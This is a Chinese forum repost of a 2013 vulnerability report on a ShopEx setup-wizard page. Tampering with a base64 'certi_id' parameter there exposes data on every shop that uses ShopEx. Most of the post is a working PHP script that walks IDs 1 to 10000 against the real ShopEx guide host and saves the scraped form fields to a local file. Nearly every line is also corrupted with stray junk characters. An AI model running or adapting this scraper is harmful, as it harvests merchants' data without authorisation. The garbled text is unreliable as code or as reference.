|
|
简要描述:
# E4 v- l. ^' s4 L, [/ p2 JShopEx某接口缺陷,可遍历所有网站
8 C h3 K' Q5 A. Y0 O& S. `" v详细说明:
$ B: W+ g# Y# e2 A0 a) a8 z$ Q问题出现在shopex 网店使用向导页面
/ t/ P# v; O1 q( ]5 ?8 [* `5 I3 t* V' i% ?$ [7 C4 y
" o5 j1 |2 j: k n2 g5 h4 Z- j# m: w+ u
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) Q6 ^) t$ o( c$ o1 x! z) I0 ]
2 _5 L5 p. `6 I
6 v! _6 m+ y* R! ^0 C) A* [+ t) }8 a4 i- z7 K, D+ R
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
! e- ?' h8 d% P# f% A7 Y4 Z5 y) X- t
$ q) t7 t! z! U% }
% ~$ V2 ]% z% [1 Y/ a; G5 V% z! Y
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
4 C5 w) N" d, O, \% E9 x/ }
' L8 S1 E; A" h {3 E
) ?( v/ e7 w; n0 g5 d
9 S6 k6 F) R- I5 f6 d<?php
- [8 E! v; U/ Y0 L) N
* |0 X8 ~, o( x# y, K for ($i=1; $i < 10000; $i++) { //遍历7 c- n/ U5 ~) Z0 b" ^" h+ T, A' Q
7 b% t% x1 D# g; w2 A1 q k& V4 k
ShowshopExD($i);* g: |1 V! w. ^+ N( v. H1 `
: w1 P5 v1 q6 l! [ }# q. z# ^: s2 T2 A
) y2 H+ X) u0 y, O: H3 b5 f9 q( r
function ShowshopExD($cid) {
9 G+ @. u1 `3 @! L1 f/ o' s$ u1 d2 ?# ^& r
$url='http://guide.ecos.shopex.cn/step2.php';- F" b, [3 H9 G( T7 c
2 N, o! j' e1 a5 h" n. i& g; X
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
" @& L0 B2 z5 h. h5 B; c7 B
5 v0 S5 @' ]9 O* |& O; V1 E \ $url = $url.'?refer='.$refer;
8 h# M0 Q% Z# v, r( f
! w# {1 l! M6 u; L5 g $ch = curl_init($url);
4 |, d$ m Z! _9 r% S% p: D# _
* _# t, Z `7 n4 s: }* N curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
$ e- |* M5 w& T' R: ?* ]% p/ z6 Z/ @+ M' Z* A' G
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
& k) x4 k1 f2 C! m& _2 J/ |* f T4 W5 b# a0 X
$result = curl_exec($ch);2 T8 I _" P0 c6 F
3 i) r7 d$ g0 H" `# J$ c* o2 t
$result = mb_convert_encoding($result, "gb2312", "UTF-8");7 c, P3 E2 L- |/ y. @- M
# a! y% _9 X9 @7 I1 E
if(strpos($result,$refer))* u4 T; x9 e: P1 N ?. \% C: I
: V' K' K3 g: D5 t8 p {0 K: t; k( O- B+ t% J
) g- n* e5 u9 U $fp = fopen("c:/shopEx.txt",'ab'); //保存文件* @: p" T( P3 `
& w6 X; c3 M2 ~
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);2 i$ V5 `% S0 z" T
9 f" K8 y6 ~2 F! ~" Z" t
foreach ($value[1] as $key) {3 B) Q5 V: p( V' v7 @5 [ c
# s s+ ^& l+ v9 T6 `# V/ F preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);- C) K$ c! x) e4 q. y
( X) d- S8 q( ?. {* B$ l5 O$ m
echo $res[1][0].':'.$res[3][0]."\r\n";
6 l1 x0 b% u* X6 M+ Z8 ~/ v6 h( ~1 X3 H9 k1 l$ e# h8 J) b$ S
$col =$res[1][0].':'.$res[3][0]."\r\n";
w4 l8 C3 [: a3 G2 `8 ^; Q, o! Y5 N# ?0 B0 p9 K
fwrite($fp, $col, strlen($col));
0 O6 s- ^; \9 b, r0 n a( G6 d$ \$ V$ Y% U
}- o5 j6 w5 E7 W! k! \$ p; X
# J, v. W7 N; l5 ]
echo '--------------------------------'."\r\n";2 B# }+ {( O: m* p Y+ P
0 c) g" X, g1 M. Y fclose($fp); 1 v# P4 J$ X7 W5 h& W0 `' t2 J
# q$ ], z+ C2 |! ]( y9 p }8 h2 V. a% w2 e- Y7 b4 F
2 M, N, r' G% d( N9 u' e flush();# M# n4 [6 v3 Q: o3 }1 _- f
- U! _, c: \, H4 N5 x9 a8 P! T
curl_close($ch);/ N. n a" G# i1 P" I0 W& m! B
: _& }1 }5 c$ J1 s" A, U }6 `7 V7 {7 J% F4 H6 y
% ~' k/ w g8 K) i2 i
?>3 Y3 k9 T9 l6 V6 Z& U, B# {$ f" Y
漏洞证明:$ h2 {7 ]; C6 h) m, s
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg1 a! ]( |, D u& J3 E
refer换成其他加密方式
! `; J$ {) S* z6 |6 `, U |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对